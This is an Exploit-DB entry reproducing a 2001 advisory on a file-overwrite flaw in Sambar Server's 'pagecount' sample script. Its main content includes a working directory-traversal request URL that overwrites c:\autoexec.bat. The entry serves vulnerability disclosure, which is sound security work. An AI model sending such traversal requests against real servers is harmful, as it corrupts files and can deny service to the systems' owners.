Sambar Server 4.4/5.0 - 'pagecount' File Overwrite

EDB-ID:

21026

CVE:

2001-1010

EDB Verified:

Author:

kyprizel

Type:

remote

Exploit:   /  

Platform:

Multiple

Date:

2001-07-22

Vulnerable App: 
source: https://www.securityfocus.com/bid/3091/info

Sambar Server is a multi-threaded HTTP server for Microsoft Windows and Unix systems.

Sambar WWW Server is bundled with a sample script('pagecount') which creates temporary files on the host. However, it is possible for a remote attacker to craft a web request which will cause pagecount to overwrite existing files. Files attacked in this manner will be corrupted.

Loss of critical data and a denial of services may occur if system files are overwritten.

http://sambarserver/session/pagecount?page=index will create a file in Sambar temp directory with name 'index'

http://sambarserver/session/pagecount?page=../../../../../../autoexec.bat then the script will rewrite the first symbols of c:\autoexec.bat with it's number.

So we are able to add some text to any file on the disk.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services